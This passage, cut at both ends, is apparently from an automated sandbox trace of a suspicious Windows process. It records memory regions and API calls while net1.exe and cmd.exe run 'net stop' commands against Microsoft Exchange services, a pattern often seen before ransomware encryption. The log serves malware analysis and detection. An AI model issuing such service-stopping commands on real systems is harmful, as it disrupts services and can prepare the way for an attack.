pagefile_backed name = "pagefile_0x0000000001010000" filename = "" Region: id = 9586 start_va = 0x1030000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 9587 start_va = 0x1070000 end_va = 0x1073fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 9588 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 9589 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 9590 start_va = 0x50c0000 end_va = 0x513ffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 9591 start_va = 0x5140000 end_va = 0x5140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005140000" filename = "" Region: id = 9592 start_va = 0x5150000 end_va = 0x5151fff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 9593 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9594 start_va = 0x7f750000 end_va = 0x7f772fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f750000" filename = "" Region: id = 9595 start_va = 0x7f77a000 end_va = 0x7f77afff entry_point = 0x0 region_type = private name = "private_0x000000007f77a000" filename = "" Region: id = 9596 start_va = 0x7f77c000 end_va = 0x7f77efff entry_point = 0x0 region_type = private name = "private_0x000000007f77c000" filename = "" Region: id = 9597 start_va = 0x7f77f000 end_va = 0x7f77ffff entry_point = 0x0 region_type = private name = "private_0x000000007f77f000" filename = "" Region: id = 9598 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9599 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9600 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9601 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9602 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9603 start_va = 0x5250000 end_va = 0x525ffff entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 9604 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9605 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9606 start_va = 0x53e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 9607 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9608 start_va = 0xfe0000 end_va = 0xfeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 9609 start_va = 0xff0000 end_va = 0xff3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 9610 start_va = 0x5160000 end_va = 0x521dfff entry_point = 0x5160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9611 start_va = 0x5260000 end_va = 0x529ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 9612 start_va = 0x52a0000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 9613 start_va = 0x53d0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000053d0000" filename = "" Region: id = 9614 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 9615 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 9616 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 9617 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 9618 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 9619 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 9620 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 9621 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 9622 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9623 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9624 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9625 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9626 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9627 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9628 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9629 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9630 start_va = 0x7f650000 end_va = 0x7f74ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f650000" filename = "" Region: id = 9631 start_va = 0x7f777000 end_va = 0x7f779fff entry_point = 0x0 region_type = private name = "private_0x000000007f777000" filename = "" Region: id = 9632 start_va = 0x1000000 end_va = 0x1003fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 9633 start_va = 0x5220000 end_va = 0x5222fff entry_point = 0x5220000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 9634 start_va = 0x5320000 end_va = 0x5351fff entry_point = 0x5320000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 593 os_tid = 0xd34 [0135.037] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0135.037] __set_app_type (_Type=0x1) [0135.037] __p__fmode () returned 0x77ac4d6c [0135.037] __p__commode () returned 0x77ac5b1c [0135.037] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0135.037] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0135.037] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.037] GetConsoleOutputCP () returned 0x1b5 [0135.038] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0135.038] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.040] sprintf_s (in: _DstBuf=0x513fc3c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0135.040] setlocale (category=0, locale=".437") returned="English_United States.437" [0135.041] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0135.041] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0135.041] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeAB" [0135.041] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x513f9e4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0135.041] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x513f9d8 | out: Buffer=0x513f9d8*=0x53e7f08) returned 0x0 [0135.041] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x513f9dc | out: Buffer=0x513f9dc*=0x53e8028) returned 0x0 [0135.041] __iob_func () returned 0x77ac1208 [0135.041] _fileno (_File=0x77ac1208) returned 0 [0135.041] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0135.041] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0135.041] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0135.041] _wcsicmp (_String1="config", _String2="stop") returned -16 [0135.041] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0135.041] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0135.041] _wcsicmp (_String1="file", _String2="stop") returned -13 [0135.041] _wcsicmp (_String1="files", _String2="stop") returned -13 [0135.041] _wcsicmp (_String1="group", _String2="stop") returned -12 [0135.041] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0135.041] _wcsicmp (_String1="help", _String2="stop") returned -11 [0135.041] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0135.041] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0135.041] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0135.041] _wcsicmp (_String1="session", _String2="stop") returned -15 [0135.041] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0135.041] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0135.041] _wcsicmp (_String1="share", _String2="stop") returned -12 [0135.041] _wcsicmp (_String1="start", _String2="stop") returned -14 [0135.041] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0135.041] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0135.041] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0135.041] _wcsicmp (_String1="accounts", _String2="MSExchangeAB") returned -12 [0135.041] _wcsicmp (_String1="computer", _String2="MSExchangeAB") returned -10 [0135.041] _wcsicmp (_String1="config", _String2="MSExchangeAB") returned -10 [0135.041] _wcsicmp (_String1="continue", _String2="MSExchangeAB") returned -10 [0135.041] _wcsicmp (_String1="cont", _String2="MSExchangeAB") returned -10 [0135.041] _wcsicmp (_String1="file", _String2="MSExchangeAB") returned -7 [0135.042] _wcsicmp (_String1="files", _String2="MSExchangeAB") returned -7 [0135.042] _wcsicmp (_String1="group", _String2="MSExchangeAB") returned -6 [0135.042] _wcsicmp (_String1="groups", _String2="MSExchangeAB") returned -6 [0135.042] _wcsicmp (_String1="help", _String2="MSExchangeAB") returned -5 [0135.042] _wcsicmp (_String1="helpmsg", _String2="MSExchangeAB") returned -5 [0135.042] _wcsicmp (_String1="localgroup", _String2="MSExchangeAB") returned -1 [0135.042] _wcsicmp (_String1="pause", _String2="MSExchangeAB") returned 3 [0135.042] _wcsicmp (_String1="session", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="sessions", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="sess", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="share", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="start", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="stats", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="statistics", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="stop", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="time", _String2="MSExchangeAB") returned 7 [0135.042] _wcsicmp (_String1="user", _String2="MSExchangeAB") returned 8 [0135.042] _wcsicmp (_String1="users", _String2="MSExchangeAB") returned 8 [0135.042] _wcsicmp (_String1="msg", _String2="MSExchangeAB") returned 2 [0135.042] _wcsicmp (_String1="messenger", _String2="MSExchangeAB") returned -14 [0135.042] _wcsicmp (_String1="receiver", _String2="MSExchangeAB") returned 5 [0135.042] _wcsicmp (_String1="rcv", _String2="MSExchangeAB") returned 5 [0135.042] _wcsicmp (_String1="netpopup", _String2="MSExchangeAB") returned 1 [0135.042] _wcsicmp (_String1="redirector", _String2="MSExchangeAB") returned 5 [0135.042] _wcsicmp (_String1="redir", _String2="MSExchangeAB") returned 5 [0135.042] _wcsicmp (_String1="rdr", _String2="MSExchangeAB") returned 5 [0135.042] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeAB") returned 10 [0135.042] _wcsicmp (_String1="work", _String2="MSExchangeAB") returned 10 [0135.042] _wcsicmp (_String1="wksta", _String2="MSExchangeAB") returned 10 [0135.042] _wcsicmp (_String1="prdr", _String2="MSExchangeAB") returned 3 [0135.042] _wcsicmp (_String1="devrdr", _String2="MSExchangeAB") returned -9 [0135.042] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeAB") returned -1 [0135.042] _wcsicmp (_String1="server", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="svr", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="srv", _String2="MSExchangeAB") returned 6 [0135.042] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeAB") returned -1 [0135.042] _wcsicmp (_String1="alerter", _String2="MSExchangeAB") returned -12 [0135.042] _wcsicmp (_String1="netlogon", _String2="MSExchangeAB") returned 1 [0135.042] _wcsupr (in: _String="MSExchangeAB" | out: _String="MSEXCHANGEAB") returned="MSEXCHANGEAB" [0135.042] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x53e2630 [0135.044] GetServiceKeyNameW (in: hSCManager=0x53e2630, lpDisplayName="MSEXCHANGEAB", lpServiceName=0x10a8cb0, lpcchBuffer=0x513f954 | out: lpServiceName="", lpcchBuffer=0x513f954) returned 0 [0135.045] _wcsicmp (_String1="msg", _String2="MSEXCHANGEAB") returned 2 [0135.045] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEAB") returned -14 [0135.045] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEAB") returned 5 [0135.045] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEAB") returned 5 [0135.045] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEAB") returned 5 [0135.045] _wcsicmp (_String1="redir", _String2="MSEXCHANGEAB") returned 5 [0135.045] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEAB") returned 5 [0135.045] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEAB") returned 10 [0135.045] _wcsicmp (_String1="work", _String2="MSEXCHANGEAB") returned 10 [0135.045] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEAB") returned 10 [0135.045] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEAB") returned 3 [0135.045] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEAB") returned -9 [0135.045] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEAB") returned -1 [0135.045] _wcsicmp (_String1="server", _String2="MSEXCHANGEAB") returned 6 [0135.045] _wcsicmp (_String1="svr", _String2="MSEXCHANGEAB") returned 6 [0135.045] _wcsicmp (_String1="srv", _String2="MSEXCHANGEAB") returned 6 [0135.045] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEAB") returned -1 [0135.045] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEAB") returned -12 [0135.045] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEAB") returned 1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="WORKSTATION") returned -10 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="LanmanWorkstation") returned 1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="SERVER") returned -6 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="LanmanServer") returned 1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="BROWSER") returned 11 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="BROWSER") returned 11 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="MESSENGER") returned 14 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="MESSENGER") returned 14 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="NETRUN") returned -1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="NETRUN") returned -1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="SPOOLER") returned -6 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="SPOOLER") returned -6 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="ALERTER") returned 12 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="ALERTER") returned 12 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="NETLOGON") returned -1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="NETLOGON") returned -1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="NETPOPUP") returned -1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="NETPOPUP") returned -1 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="SQLSERVER") returned -6 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="SQLSERVER") returned -6 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="REPLICATOR") returned -5 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="REPLICATOR") returned -5 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="REMOTEBOOT") returned -5 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="REMOTEBOOT") returned -5 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="TIMESOURCE") returned -7 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="TIMESOURCE") returned -7 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="AFP") returned 12 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="AFP") returned 12 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="UPS") returned -8 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="UPS") returned -8 [0135.045] _wcsicmp (_String1="MSEXCHANGEAB", _String2="XACTSRV") returned -11 [0135.046] _wcsicmp (_String1="MSEXCHANGEAB", _String2="XACTSRV") returned -11 [0135.046] _wcsicmp (_String1="MSEXCHANGEAB", _String2="TCPIP") returned -7 [0135.046] _wcsicmp (_String1="MSEXCHANGEAB", _String2="TCPIP") returned -7 [0135.046] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x53e3758 [0135.046] OpenServiceW (hSCManager=0x53e3758, lpServiceName="MSEXCHANGEAB", dwDesiredAccess=0x84) returned 0x0 [0135.046] GetLastError () returned 0x424 [0135.046] CloseServiceHandle (hSCObject=0x53e3758) returned 1 [0135.046] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0135.046] LoadLibraryW (lpLibFileName="NETMSG") returned 0x5220000 [0135.047] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x5220000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0135.048] GetFileType (hFile=0x40) returned 0x2 [0135.048] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x513f7f0 | out: lpMode=0x513f7f0) returned 1 [0135.048] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x513f7fc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x513f7fc*=0x1e) returned 1 [0135.048] GetFileType (hFile=0x40) returned 0x2 [0135.048] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x513f7f0 | out: lpMode=0x513f7f0) returned 1 [0135.048] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x513f7fc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x513f7fc*=0x2) returned 1 [0135.049] _ultow (in: _Dest=0x889, _Radix=85194768 | out: _Dest=0x889) returned="2185" [0135.049] FormatMessageW (in: dwFlags=0x2800, lpSource=0x5220000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0135.049] GetFileType (hFile=0x40) returned 0x2 [0135.049] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x513f7e0 | out: lpMode=0x513f7e0) returned 1 [0135.049] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x513f7ec, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x513f7ec*=0x34) returned 1 [0135.049] GetFileType (hFile=0x40) returned 0x2 [0135.049] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x513f7e0 | out: lpMode=0x513f7e0) returned 1 [0135.050] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x513f7ec, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x513f7ec*=0x2) returned 1 [0135.050] NetApiBufferFree (Buffer=0x53e7f08) returned 0x0 [0135.050] NetApiBufferFree (Buffer=0x53e8028) returned 0x0 [0135.050] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeAB" [0135.050] exit (_Code=2) Thread: id = 594 os_tid = 0xdfc Process: id = "189" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3d4ab000" os_pid = "0x210" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeAntispamUpdate" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9635 start_va = 0xd0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9636 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9637 start_va = 0x100000 end_va = 0x113fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 9638 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 9639 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 9640 start_va = 0x260000 end_va = 0x263fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 9641 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 9642 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 9643 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9644 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 9645 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9646 start_va = 0x7f430000 end_va = 0x7f452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f430000" filename = "" Region: id = 9647 start_va = 0x7f45b000 end_va = 0x7f45dfff entry_point = 0x0 region_type = private name = "private_0x000000007f45b000" filename = "" Region: id = 9648 start_va = 0x7f45e000 end_va = 0x7f45efff entry_point = 0x0 region_type = private name = "private_0x000000007f45e000" filename = "" Region: id = 9649 start_va = 0x7f45f000 end_va = 0x7f45ffff entry_point = 0x0 region_type = private name = "private_0x000000007f45f000" filename = "" Region: id = 9650 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9651 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9652 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9653 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9654 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9655 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 9656 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9657 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9658 start_va = 0x4450000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 9659 start_va = 